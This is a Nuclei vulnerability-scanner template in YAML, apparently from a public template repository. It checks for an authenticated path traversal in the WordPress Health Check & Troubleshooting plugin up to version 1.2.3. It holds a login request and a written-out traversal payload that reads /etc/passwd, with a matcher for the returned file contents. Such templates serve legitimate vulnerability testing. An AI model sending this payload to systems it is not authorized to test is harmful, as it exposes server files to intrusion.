nuclei-templates/vulnerabilities/wordpress/health-check-lfi.yaml

46 lines
1.3 KiB
YAML
Raw Normal View History

2022-05-01 10:09:20 +00:00
id: health-check-lfi
info:
name: Health Check & Troubleshooting <= 1.2.3 - Authenticated Path Traversal
author: DhiyaneshDK
severity: high
description: The Health Check & Troubleshooting WordPress plugin was affected by an Authenticated Path Traversal security vulnerability.
remediation: Fixed in version 1.2.4
reference:
- https://wpscan.com/vulnerability/5eecc4a7-0b44-495d-9352-78dccebfc72a
- https://www.synacktiv.com/ressources/advisories/WordPress_Health_Check_1.2.3_Vulnerabilities.pdf
tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=health-check-view-file-diff&file=../../../../../../etc/passwd
2022-05-02 19:42:36 +00:00
2022-05-01 10:09:20 +00:00
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
2022-05-02 19:42:36 +00:00
part: body
2022-05-01 10:09:20 +00:00
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- application/json
- type: status
status:
- 200